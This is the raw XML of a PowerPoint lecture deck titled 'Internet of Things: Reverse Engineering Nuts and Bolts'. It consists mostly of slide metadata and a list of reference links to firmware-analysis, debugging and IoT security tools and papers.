    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22322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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276430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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1740618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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250216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3485029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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3145267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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131785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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2261973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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298974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a6624bd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a6624bd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4237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a6624bdc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a6624bdc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577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a6624bd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a6624bd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081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a6624bdc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a6624bdc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6820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a6624bdc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a6624bdc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397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a6624bdcb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a6624bdc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69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504400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a6624bdc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a6624bdc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263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a6624bdc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a6624bdc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2586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a6624bdc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a6624bdc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123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a6624bdc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a6624bdc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5949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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524832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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3395956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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1173664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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31480792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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21888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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3457513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196463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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15319998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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20105572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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8229585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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69979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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42288111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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3158111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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40315221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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3566488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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3981683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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111332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1611258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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42313355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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35965446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Was technically already introduced earlier</a:t>
            </a:r>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31095777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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="884081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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547884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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18544630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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151476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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1568169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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3180629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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2228902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870494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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5717817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7A9093-D28F-D547-8C0B-7E6BA1262672}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33331216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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383292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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39115083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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3375019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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20492857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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22149439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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20167338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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14844927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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99513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36518809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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150579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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28624877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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34654129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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2873709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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13305357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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41203379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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34888793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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6744130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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39997787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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206104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1324325" y="6367925"/>
            <a:ext cx="655472" cy="365125"/>
          </a:xfrm>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fld id="{171587C7-035C-914D-98C8-540C481AB303}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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fld id="{6D91F561-50CE-FB48-857E-984E6D14CC33}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182194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548679"/>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600201"/>
            <a:ext cx="10972800" cy="4525963"/>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4FB1423F-CADE-E447-A695-9A3983514D5D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20</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34839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855DE-CFE1-A644-AE27-75D6C391CC48}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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3CCEB8-0D4D-4B47-A0C8-3F93EF3FC476}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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90395E-F36D-4C43-A330-DCE1994B24E8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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87603-209C-BE4B-B53F-0438802EFC21}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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B4E5B4-9082-B843-AD62-8A99953A19A1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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F4F01F-1A8E-124C-9028-142CC7D21748}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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D1B2F6-F4A1-9D4D-8BFF-22CDD3AE998B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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2FCA7B8-B783-9544-8D07-CA692E08C6F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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480F73-A10C-9F45-9F21-90186504F317}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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3BA7D-355B-C843-8222-6E70BA8C8A21}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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4CFC6-E841-774B-B92C-01AC31587375}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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a:xfrm>
            <a:off x="11308466" y="6356350"/>
            <a:ext cx="607410" cy="365125"/>
          </a:xfrm>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fld id="{2F1A0EAE-C70F-774C-ADCF-F6702E2E6865}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20</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fld id="{8F7D9E34-AFE2-E24F-8E4A-0571E741A616}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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fld id="{92EBDF98-DA5D-3248-8324-2C72CE52E52C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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27443" y="6356350"/>
            <a:ext cx="688433"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84BB34-F417-D440-9264-79447234A0E2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/30/20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JTAG"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01.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://openocd.org/"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hyperlink" Target="http://infocenter.arm.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sourceforge.net/projects/openocd/files/openocd/0.8.0/"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ghidra-sre.org/"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hyperlink" Target="https://www.youtube.com/watch?v=xDyLy0zLV7s"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man7.org/linux/man-pages/man2/ptrace.2.html"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hyperlink" Target="http://www.secretmango.com/jimb/Whitepapers/ptrace/ptrace.html"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www.ugreen.com/product/list-USB_Connectivities_USB_Card_Reader-en.html"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s://en.wikipedia.org/wiki/GPS_signals"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hyperlink" Target="https://github.com/B44D3R/SDR-GPS-SPOOF"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wiki.newae.com/Main_Page"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cad.onshape.com/help/PDF/Onshape.pdf" TargetMode="External"/><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hyperlink" Target="https://en.wikipedia.org/wiki/G-code"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recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Reversing-IoT-Xiaomi-ecosystem.pdf"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www.nsa.gov/News-Features/News-Stories/Article-View/Article/1775584/ghidra-the-software-reverse-engineering-tool-youve-been-waiting-for-is-here/"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hyperlink" Target="https://www.w3.org/WoT/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide145.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mozilla-iot/wiki/wiki/Supported-Hardware#adapters" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iot.mozilla.org/gateway/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iot.mozilla.org/"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ftp1.digi.com/support/documentation/90000852_K.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s://docs.px4.io/en/frames_multicopter/matrice100.html" TargetMode="External"/><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iki.debian.org/QemuUserEmul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medicineyeh.wordpress.com/2016/03/29/buildup-your-arm-image-for-qemu/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.qemu.org/Documentation/Platforms/AR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hex-rays.com/products/ida/overview.s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nsa.gov/News-Features/News-Stories/Article-View/Article/1775584/ghidra-the-software-reverse-engineering-tool-youve-been-waiting-for-is-her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arm.com/docs/ddi0487/latest/arm-architecture-reference-manual-armv8-for-armv8-a-architecture-profil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file:////var/folders/d9/tmdl02r13kz78_v3wm_dggm40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page29image7994608"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tcpdump.org/manpages/tcpdump.1.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://openwrt.org/"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en.wikipedia.org/wiki/Dnsmasq" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Iptables" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/information-gathering/sslstri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openwrt.org/toh/tp-link/archer-c7-1750"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hyperlink" Target="http://tftpd32.jounin.ne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www.northeastern.edu/"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www.khoury.northeastern.ed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www.khoury.northeastern.edu/"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danielmiessler.com/study/tcpdump/"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tools.kali.org/information-gathering/sslstrip"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ReFirmLabs/binwal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brianpow/firmware-mod-kit.gi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ttify/firmware-analysis-toolkit.git"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raigz28/firmwalker"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hyperlink" Target="http://www.filewatcher.com/m/DIR412A1_FW114WWb02.bin.3534983-0.htm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instructables.com/id/How-to-reverse-engineer-a-schematic-from-a-circui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tools.ietf.org/id/draft-moran-fud-manifest-00.html"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hyperlink" Target="https://docs.microsoft.com/en-us/azure/iot-hub/tutorial-firmware-update" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://d1.awsstatic.com/whitepapers/architecture/AWS-IoT-Lens.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf"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user.eng.umd.edu/~blj/CS-590.26/micron-tn2919.pdf"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hyperlink" Target="https://www.martview.com/emmc-emcp-socket-2-in-1-emmc-emcp-socket-usb3-0-superspeed-usd-emmc-reader-for-emmc-dongle.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gillware.com/data-recovery-services/flash-storage-data-recovery/usb-drive-data-recovery/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ww1.microchip.com/downloads/en/AppNotes/Atmel-2575-C-Functions-for-Reading-and-Writing-to-Flash-Memory_ApplicationNote_AVR106.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busybox.n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buildroot.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rusolut.com/wp-content/uploads/2018/10/eMMCvsNAND.pdf" TargetMode="Externa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bitbucket.org/jmichel/tools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ohjeongwook/DumpFlash" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sviehb/jefferson" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nlitsme/ubidump/blob/master/README.m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mkrak.org/2018/01/10/updating-embedded-linux-devices-part1/"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blackhat.com/docs/us-14/materials/us-14-Oh-Reverse-Engineering-Flash-Memory-For-Fun-And-Benefit.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-14/materials/us-14-Oh-Reverse-Engineering-Flash-Memory-For-Fun-And-Benefit-WP.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.j-michel.org/blog/2014/05/27/from-nand-chip-to-files"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github.com/dgiese/dustcloud"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4909" y="1165913"/>
            <a:ext cx="11167152" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internet of Things: Reverse Engineering Nuts and Bolts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047999" y="3978576"/>
            <a:ext cx="8604062" cy="2094271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US"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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>johnmanferdelli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@hotmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contributions from Dennis Giese</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D5172B0-3291-C548-A57E-2EF269921B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332509" y="6331530"/>
            <a:ext cx="3502882" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version of April 29, 2020, 16:40</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21AFC2D6-6D41-9B40-87E8-2D3F5F138A5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
